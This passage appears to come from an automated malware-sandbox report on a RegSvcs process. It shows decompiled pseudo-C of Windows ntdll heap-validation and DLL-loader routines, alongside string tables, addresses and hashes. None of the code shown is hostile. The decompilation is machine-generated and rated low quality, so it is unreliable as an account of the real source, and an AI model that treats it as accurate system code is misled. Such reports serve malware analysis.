                                          										E012FB150();
                                          									} else {
                                          										E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									}
                                          									_push( *((intOrPtr*)(_t332 + 0x28)));
                                          									_push(_t415);
                                          									_push("Heap block at %p is not last block in segment (%p)\n");
                                          									L95:
                                          									E012FB150();
                                          									goto L117;
                                          								}
                                          								_v12 = _v12 + 1;
                                          								_v16 = _v16 + (_t245 >> 0xc);
                                          								if( *(_t414 + 0x4c) != 0) {
                                          									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                          									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          								}
                                          								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                          								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                          									L82:
                                          									_v8 = _v8 & 0x00000000;
                                          									goto L86;
                                          								} else {
                                          									if( *(_t414 + 0x4c) != 0) {
                                          										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                          										 *_t415 = _t397;
                                          										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                          										_t442 = _t397 >> 0x18 - _t367;
                                          										if(_t397 >> 0x18 != _t367) {
                                          											_push(_t367);
                                          											E013AFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                          										}
                                          									}
                                          									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                          										_t259 =  *[fs:0x30];
                                          										__eflags =  *(_t259 + 0xc);
                                          										if( *(_t259 + 0xc) == 0) {
                                          											_push("HEAP: ");
                                          											E012FB150();
                                          										} else {
                                          											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          										}
                                          										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                          										_push(_t415);
                                          										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                          										goto L95;
                                          									} else {
                                          										if( *(_t414 + 0x4c) != 0) {
                                          											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          										}
                                          										goto L82;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						_t281 = _v28 + 0xfffffff0;
                                          						_v24 = _t281;
                                          						__eflags = _t390 & 0x00000002;
                                          						if((_t390 & 0x00000002) != 0) {
                                          							__eflags = _t281 - 4;
                                          							if(_t281 > 4) {
                                          								_t281 = _t281 - 4;
                                          								__eflags = _t281;
                                          								_v24 = _t281;
                                          							}
                                          						}
                                          						__eflags = _t390 & 0x00000008;
                                          						if((_t390 & 0x00000008) == 0) {
                                          							_t102 = _t415 + 0x10; // -8
                                          							_t283 = E0134D540(_t102, _t281, 0xfeeefeee);
                                          							_v20 = _t283;
                                          							__eflags = _t283 - _v24;
                                          							if(_t283 != _v24) {
                                          								_t284 =  *[fs:0x30];
                                          								__eflags =  *(_t284 + 0xc);
                                          								if( *(_t284 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_t288 = _v20 + 8 + _t415;
                                          								__eflags = _t288;
                                          								_push(_t288);
                                          								_push(_t415);
                                          								_push("Free Heap block %p modified at %p after it was freed\n");
                                          								goto L95;
                                          							}
                                          							goto L66;
                                          						} else {
                                          							_t374 =  *(_t415 + 8);
                                          							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                          							_v24 = _t374;
                                          							_v28 = _t400;
                                          							_t294 =  *(_t374 + 4);
                                          							__eflags =  *_t400 - _t294;
                                          							if( *_t400 != _t294) {
                                          								L64:
                                          								_push(_t374);
                                          								_push( *_t400);
                                          								_t101 = _t415 + 8; // -16
                                          								E013BA80D(_t414, 0xd, _t101, _t294);
                                          								goto L86;
                                          							}
                                          							_t56 = _t415 + 8; // -16
                                          							__eflags =  *_t400 - _t56;
                                          							_t374 = _v24;
                                          							if( *_t400 != _t56) {
                                          								goto L64;
                                          							}
                                          							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                          							_t402 =  *(_t414 + 0xb4);
                                          							__eflags = _t402;
                                          							if(_t402 == 0) {
                                          								L35:
                                          								_t298 = _v28;
                                          								 *_t298 = _t374;
                                          								 *(_t374 + 4) = _t298;
                                          								__eflags =  *(_t415 + 2) & 0x00000008;
                                          								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                          									L39:
                                          									_t377 =  *_t415 & 0x0000ffff;
                                          									_t299 = _t414 + 0xc0;
                                          									_v28 =  *_t415 & 0x0000ffff;
                                          									 *(_t415 + 2) = 0;
                                          									 *((char*)(_t415 + 7)) = 0;
                                          									__eflags =  *(_t414 + 0xb4);
                                          									if( *(_t414 + 0xb4) == 0) {
                                          										_t378 =  *_t299;
                                          									} else {
                                          										_t378 = E0131E12C(_t414, _t377);
                                          										_t299 = _t414 + 0xc0;
                                          									}
                                          									__eflags = _t299 - _t378;
                                          									if(_t299 == _t378) {
                                          										L51:
                                          										_t300 =  *((intOrPtr*)(_t378 + 4));
                                          										__eflags =  *_t300 - _t378;
                                          										if( *_t300 != _t378) {
                                          											_push(_t378);
                                          											_push( *_t300);
                                          											__eflags = 0;
                                          											E013BA80D(0, 0xd, _t378, 0);
                                          										} else {
                                          											_t87 = _t415 + 8; // -16
                                          											_t406 = _t87;
                                          											 *_t406 = _t378;
                                          											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                          											 *_t300 = _t406;
                                          											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                          										}
                                          										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                          										_t405 =  *(_t414 + 0xb4);
                                          										__eflags = _t405;
                                          										if(_t405 == 0) {
                                          											L61:
                                          											__eflags =  *(_t414 + 0x4c);
                                          											if(__eflags != 0) {
                                          												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                          												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          											}
                                          											goto L86;
                                          										} else {
                                          											_t380 =  *_t415 & 0x0000ffff;
                                          											while(1) {
                                          												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                          												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                          													break;
                                          												}
                                          												_t307 =  *_t405;
                                          												__eflags = _t307;
                                          												if(_t307 == 0) {
                                          													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                          													L60:
                                          													_t94 = _t415 + 8; // -16
                                          													E0131E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                          													goto L61;
                                          												}
                                          												_t405 = _t307;
                                          											}
                                          											_t309 = _t380;
                                          											goto L60;
                                          										}
                                          									} else {
                                          										_t407 =  *(_t414 + 0x4c);
                                          										while(1) {
                                          											__eflags = _t407;
                                          											if(_t407 == 0) {
                                          												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                          											} else {
                                          												_t315 =  *(_t378 - 8);
                                          												_t407 =  *(_t414 + 0x4c);
                                          												__eflags = _t315 & _t407;
                                          												if((_t315 & _t407) != 0) {
                                          													_t315 = _t315 ^  *(_t414 + 0x50);
                                          													__eflags = _t315;
                                          												}
                                          												_t312 = _t315 & 0x0000ffff;
                                          											}
                                          											__eflags = _v28 - (_t312 & 0x0000ffff);
                                          											if(_v28 <= (_t312 & 0x0000ffff)) {
                                          												goto L51;
                                          											}
                                          											_t378 =  *_t378;
                                          											__eflags = _t414 + 0xc0 - _t378;
                                          											if(_t414 + 0xc0 != _t378) {
                                          												continue;
                                          											}
                                          											goto L51;
                                          										}
                                          										goto L51;
                                          									}
                                          								}
                                          								_t317 = E0131A229(_t414, _t415);
                                          								__eflags = _t317;
                                          								if(_t317 != 0) {
                                          									goto L39;
                                          								}
                                          								E0131A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                          								goto L86;
                                          							}
                                          							_t385 =  *_t415 & 0x0000ffff;
                                          							while(1) {
                                          								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                          								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                          									break;
                                          								}
                                          								_t320 =  *_t402;
                                          								__eflags = _t320;
                                          								if(_t320 == 0) {
                                          									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                          									L34:
                                          									_t63 = _t415 + 8; // -16
                                          									E0131BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                          									_t374 = _v24;
                                          									goto L35;
                                          								}
                                          								_t402 = _t320;
                                          							}
                                          							_t322 = _t385;
                                          							goto L34;
                                          						}
                                          					}
                                          					if(_a20 == 0) {
                                          						L18:
                                          						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                          							goto L67;
                                          						}
                                          						if(E013A23E3(_t414, _t415) == 0) {
                                          							goto L117;
                                          						}
                                          						goto L67;
                                          					} else {
                                          						if((_t390 & 0x00000002) == 0) {
                                          							_t326 =  *(_t415 + 3) & 0x000000ff;
                                          						} else {
                                          							_t328 = E012F1F5B(_t415);
                                          							_t342 = _v20;
                                          							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                          						}
                                          						_t429 = _t326;
                                          						if(_t429 == 0) {
                                          							goto L18;
                                          						}
                                          						if(_t429 >= 0) {
                                          							__eflags = _t326 & 0x00000800;
                                          							if(__eflags != 0) {
                                          								goto L18;
                                          							}
                                          							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                          							if(__eflags >= 0) {
                                          								goto L18;
                                          							}
                                          							_t412 = _a20;
                                          							_t327 = _t326 & 0x0000ffff;
                                          							L17:
                                          							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                          							goto L18;
                                          						}
                                          						_t327 = _t326 & 0x00007fff;
                                          						if(_t327 >= 0x81) {
                                          							goto L18;
                                          						}
                                          						_t412 = _a24;
                                          						goto L17;
                                          					}
                                          					L86:
                                          				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                          				_t189 = _v12;
                                          				goto L88;
                                          			}
                                          0x013b4d1a
                                          0x013b4d1a
                                          0x013b4d1a
                                          0x013b4d1d
                                          0x013b4d1f
                                          0x013b4d22
                                          0x013b4d24
                                          0x013b4d24
                                          0x013b4d3c
                                          0x013b4d3f
                                          0x013b4d45
                                          0x013b4d47
                                          0x013b4d6c
                                          0x013b4d6c
                                          0x013b4d70
                                          0x013b4d7e
                                          0x013b4d84
                                          0x013b4d84
                                          0x00000000
                                          0x013b4d49
                                          0x013b4d49
                                          0x013b4d56
                                          0x013b4d56
                                          0x013b4d59
                                          0x00000000
                                          0x00000000
                                          0x013b4d4e
                                          0x013b4d50
                                          0x013b4d52
                                          0x013b4d8e
                                          0x013b4d5d
                                          0x013b4d5f
                                          0x013b4d67
                                          0x00000000
                                          0x013b4d67
                                          0x013b4d54
                                          0x013b4d54
                                          0x013b4d5b
                                          0x00000000
                                          0x013b4d5b
                                          0x013b4ce2
                                          0x013b4ce2
                                          0x013b4ce5
                                          0x013b4ce5
                                          0x013b4ce7
                                          0x013b4cfb
                                          0x013b4ce9
                                          0x013b4ce9
                                          0x013b4cec
                                          0x013b4cef
                                          0x013b4cf1
                                          0x013b4cf3
                                          0x013b4cf3
                                          0x013b4cf3
                                          0x013b4cf6
                                          0x013b4cf6
                                          0x013b4d02
                                          0x013b4d05
                                          0x00000000
                                          0x00000000
                                          0x013b4d07
                                          0x013b4d0f
                                          0x013b4d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b4d11
                                          0x00000000
                                          0x013b4ce5
                                          0x013b4ce0
                                          0x013b4c8a
                                          0x013b4c8f
                                          0x013b4c91
                                          0x00000000
                                          0x00000000
                                          0x013b4c9d
                                          0x00000000
                                          0x013b4c9d
                                          0x013b4c52
                                          0x013b4c5f
                                          0x013b4c5f
                                          0x013b4c62
                                          0x00000000
                                          0x00000000
                                          0x013b4c57
                                          0x013b4c59
                                          0x013b4c5b
                                          0x013b4caa
                                          0x013b4c66
                                          0x013b4c68
                                          0x013b4c70
                                          0x013b4c75
                                          0x00000000
                                          0x013b4c75
                                          0x013b4c5d
                                          0x013b4c5d
                                          0x013b4c64
                                          0x00000000
                                          0x013b4c64
                                          0x013b4c17
                                          0x013b4b75
                                          0x013b4bc4
                                          0x013b4bc8
                                          0x00000000
                                          0x00000000
                                          0x013b4bd9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b4b77
                                          0x013b4b7a
                                          0x013b4b8c
                                          0x013b4b7c
                                          0x013b4b7e
                                          0x013b4b83
                                          0x013b4b86
                                          0x013b4b86
                                          0x013b4b90
                                          0x013b4b93
                                          0x00000000
                                          0x00000000
                                          0x013b4b95
                                          0x013b4bab
                                          0x013b4bb0
                                          0x00000000
                                          0x00000000
                                          0x013b4bb2
                                          0x013b4bb9
                                          0x00000000
                                          0x00000000
                                          0x013b4bbb
                                          0x013b4bbe
                                          0x013b4bc1
                                          0x013b4bc1
                                          0x00000000
                                          0x013b4bc1
                                          0x013b4b97
                                          0x013b4ba4
                                          0x00000000
                                          0x00000000
                                          0x013b4ba6
                                          0x00000000
                                          0x013b4ba6
                                          0x013b4ea9
                                          0x013b4ea9
                                          0x013b4eb2
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: a4f375d40011baf4c9d968c8c8e3ad778bddc6f3ce6f4e68f8360ab86659e973
                                          • Instruction ID: d1c44fa3936a5c7dc4ab451a0be6467c6cd3e802e5374abb4fb07c0155f47bd9
                                          • Opcode Fuzzy Hash: a4f375d40011baf4c9d968c8c8e3ad778bddc6f3ce6f4e68f8360ab86659e973
                                          • Instruction Fuzzy Hash: B012C0306106469FDB25CF69C485BF6BBF5FF48708F14845DE6868BA82E734E880CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E01328E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0x13ed360 ^ _t52;
                                          				_t49 = 0;
                                          				_t48 = __ecx;
                                          				_t55 =  *0x13e8464; // 0x74660110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					if( !_t49 >= 0) {
                                          						if(( *0x13e5780 & 0x00000003) != 0) {
                                          							E01375510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0x13e5780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E0133B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                          				_t43 =  *0x13e7984; // 0xe93e68
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                          					if(_t48 == _t43) {
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					_t51 =  *0x13e8464; // 0x74660110
                                          					 *0x13eb1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E01329B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0x13e5780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E01375510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}





















                                          APIs
                                          Strings
                                          • h>, xrefs: 01328E2C
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01369357
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0136932A
                                          • LdrpFindDllActivationContext, xrefs: 01369331, 0136935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0136933B, 01369367
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2227842046
                                          • Opcode ID: bef443fa2a00ad09a7a05806e8d06c715c068c5ae07f1a3ddb3b4ab6f6cf9791
                                          • Instruction ID: 1dc528790e4fcfb16f4a34b96f5ccc5c01865f0e9ee3241fa5bdd2eb987f8c13
                                          • Opcode Fuzzy Hash: bef443fa2a00ad09a7a05806e8d06c715c068c5ae07f1a3ddb3b4ab6f6cf9791
                                          • Instruction Fuzzy Hash: 2F41D832A403399FEB36BA1CC849B75B7F9AB0475CF0685E9E90C5B591E7709D808781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E013B4496(signed int* __ecx, void* __edx) {
                                          				signed int _v5;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed char _v24;
                                          				signed int* _v28;
                                          				char _v32;
                                          				signed int* _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				void* _t150;
                                          				intOrPtr _t151;
                                          				signed char _t156;
                                          				intOrPtr _t157;
                                          				unsigned int _t169;
                                          				intOrPtr _t170;
                                          				signed int* _t183;
                                          				signed char _t184;
                                          				intOrPtr _t191;
                                          				signed int _t201;
                                          				intOrPtr _t203;
                                          				intOrPtr _t212;
                                          				intOrPtr _t220;
                                          				signed int _t230;
                                          				signed int _t241;
                                          				signed int _t244;
                                          				void* _t259;
                                          				signed int _t260;
                                          				signed int* _t261;
                                          				intOrPtr* _t262;
                                          				signed int _t263;
                                          				signed int* _t264;
                                          				signed int _t267;
                                          				signed int* _t268;
                                          				void* _t270;
                                          				void* _t281;
                                          				signed short _t285;
                                          				signed short _t289;
                                          				signed int _t291;
                                          				signed int _t298;
                                          				signed char _t303;
                                          				signed char _t308;
                                          				signed int _t314;
                                          				intOrPtr _t317;
                                          				unsigned int _t319;
                                          				signed int* _t325;
                                          				signed int _t326;
                                          				signed int _t327;
                                          				intOrPtr _t328;
                                          				signed int _t329;
                                          				signed int _t330;
                                          				signed int* _t331;
                                          				signed int _t332;
                                          				signed int _t350;
                                          
                                          				_t259 = __edx;
                                          				_t331 = __ecx;
                                          				_v28 = __ecx;
                                          				_v20 = 0;
                                          				_v12 = 0;
                                          				_t150 = E013B49A4(__ecx);
                                          				_t267 = 1;
                                          				if(_t150 == 0) {
                                          					L61:
                                          					_t151 =  *[fs:0x30];
                                          					__eflags =  *((char*)(_t151 + 2));
                                          					if( *((char*)(_t151 + 2)) != 0) {
                                          						 *0x13e6378 = _t267;
                                          						asm("int3");
                                          						 *0x13e6378 = 0;
                                          					}
                                          					__eflags = _v12;
                                          					if(_v12 != 0) {
                                          						_t105 =  &_v16;
                                          						 *_t105 = _v16 & 0x00000000;
                                          						__eflags =  *_t105;
                                          						E0132174B( &_v12,  &_v16, 0x8000);
                                          					}
                                          					L65:
                                          					__eflags = 0;
                                          					return 0;
                                          				}
                                          				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                          					_t268 =  &(_t331[0x30]);
                                          					_v32 = 0;
                                          					_t260 =  *_t268;
                                          					_t308 = 0;
                                          					_v24 = 0;
                                          					while(_t268 != _t260) {
                                          						_t260 =  *_t260;
                                          						_v16 =  *_t325 & 0x0000ffff;
                                          						_t156 = _t325[0];
                                          						_v28 = _t325;
                                          						_v5 = _t156;
                                          						__eflags = _t156 & 0x00000001;
                                          						if((_t156 & 0x00000001) != 0) {
                                          							_t157 =  *[fs:0x30];
                                          							__eflags =  *(_t157 + 0xc);
                                          							if( *(_t157 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push(_t325);
                                          							E012FB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                          							L32:
                                          							_t270 = 0;
                                          							__eflags = _t331[0x13];
                                          							if(_t331[0x13] != 0) {
                                          								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                          								 *_t325 =  *_t325 ^ _t331[0x14];
                                          							}
                                          							L60:
                                          							_t267 = _t270 + 1;
                                          							__eflags = _t267;
                                          							goto L61;
                                          						}
                                          						_t169 =  *_t325 & 0x0000ffff;
                                          						__eflags = _t169 - _t308;
                                          						if(_t169 < _t308) {
                                          							_t170 =  *[fs:0x30];
                                          							__eflags =  *(_t170 + 0xc);
                                          							if( *(_t170 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							E012FB150("Non-Dedicated free list element %p is out of order\n", _t325);
                                          							goto L32;
                                          						} else {
                                          							__eflags = _t331[0x13];
                                          							_t308 = _t169;
                                          							_v24 = _t308;
                                          							if(_t331[0x13] != 0) {
                                          								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                          								 *_t325 =  *_t325 ^ _t331[0x14];
                                          								__eflags =  *_t325;
                                          							}
                                          							_t26 =  &_v32;
                                          							 *_t26 = _v32 + 1;
                                          							__eflags =  *_t26;
                                          							continue;
                                          						}
                                          					}
                                          					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                          					if( *0x13e6350 != 0 && _t331[0x2f] != 0) {
                                          						_push(4);
                                          						_push(0x1000);
                                          						_push( &_v16);
                                          						_push(0);
                                          						_push( &_v12);
                                          						_push(0xffffffff);
                                          						if(E01339660() >= 0) {
                                          							_v20 = _v12 + 0x204;
                                          						}
                                          					}
                                          					_t183 =  &(_t331[0x27]);
                                          					_t281 = 0x81;
                                          					_t326 =  *_t183;
                                          					if(_t183 == _t326) {
                                          						L49:
                                          						_t261 =  &(_t331[0x29]);
                                          						_t184 = 0;
                                          						_t327 =  *_t261;
                                          						_t282 = 0;
                                          						_v24 = 0;
                                          						_v36 = 0;
                                          						__eflags = _t327 - _t261;
                                          						if(_t327 == _t261) {
                                          							L53:
                                          							_t328 = _v32;
                                          							_v28 = _t331;
                                          							__eflags = _t328 - _t184;
                                          							if(_t328 == _t184) {
                                          								__eflags = _t331[0x1d] - _t282;
                                          								if(_t331[0x1d] == _t282) {
                                          									__eflags = _v12;
                                          									if(_v12 == 0) {
                                          										L82:
                                          										_t267 = 1;
                                          										__eflags = 1;
                                          										goto L83;
                                          									}
                                          									_t329 = _t331[0x2f];
                                          									__eflags = _t329;
                                          									if(_t329 == 0) {
                                          										L77:
                                          										_t330 = _t331[0x22];
                                          										__eflags = _t330;
                                          										if(_t330 == 0) {
                                          											L81:
                                          											_t129 =  &_v16;
                                          											 *_t129 = _v16 & 0x00000000;
                                          											__eflags =  *_t129;
                                          											E0132174B( &_v12,  &_v16, 0x8000);
                                          											goto L82;
                                          										}
                                          										_t314 = _t331[0x21] & 0x0000ffff;
                                          										_t285 = 1;
                                          										__eflags = 1 - _t314;
                                          										if(1 >= _t314) {
                                          											goto L81;
                                          										} else {
                                          											goto L79;
                                          										}
                                          										while(1) {
                                          											L79:
                                          											_t330 = _t330 + 0x40;
                                          											_t332 = _t285 & 0x0000ffff;
                                          											_t262 = _v20 + _t332 * 4;
                                          											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                          											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                          												break;
                                          											}
                                          											_t285 = _t285 + 1;
                                          											__eflags = _t285 - _t314;
                                          											if(_t285 < _t314) {
                                          												continue;
                                          											}
                                          											goto L81;
                                          										}
                                          										_t191 =  *[fs:0x30];
                                          										__eflags =  *(_t191 + 0xc);
                                          										if( *(_t191 + 0xc) == 0) {
                                          											_push("HEAP: ");
                                          											E012FB150();
                                          										} else {
                                          											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          										}
                                          										_push(_t262);
                                          										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                          										_t148 = _t330 + 0x10; // 0x10
                                          										_push( *((intOrPtr*)(_t330 + 8)));
                                          										E012FB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                          										L59:
                                          										_t270 = 0;
                                          										__eflags = 0;
                                          										goto L60;
                                          									}
                                          									_t289 = 1;
                                          									__eflags = 1;
                                          									while(1) {
                                          										_t201 = _v12;
                                          										_t329 = _t329 + 0xc;
                                          										_t263 = _t289 & 0x0000ffff;
                                          										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                          										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                          											break;
                                          										}
                                          										_t289 = _t289 + 1;
                                          										__eflags = _t289 - 0x81;
                                          										if(_t289 < 0x81) {
                                          											continue;
                                          										}
                                          										goto L77;
                                          									}
                                          									_t203 =  *[fs:0x30];
                                          									__eflags =  *(_t203 + 0xc);
                                          									if( *(_t203 + 0xc) == 0) {
                                          										_push("HEAP: ");
                                          										E012FB150();
                                          									} else {
                                          										E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									}
                                          									_t291 = _v12;
                                          									_push(_t291 + _t263 * 4);
                                          									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                          									_push( *((intOrPtr*)(_t329 + 8)));
                                          									E012FB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                          									goto L59;
                                          								}
                                          								_t212 =  *[fs:0x30];
                                          								__eflags =  *(_t212 + 0xc);
                                          								if( *(_t212 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push(_t331[0x1d]);
                                          								_push(_v36);
                                          								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                          								L58:
                                          								E012FB150();
                                          								goto L59;
                                          							}
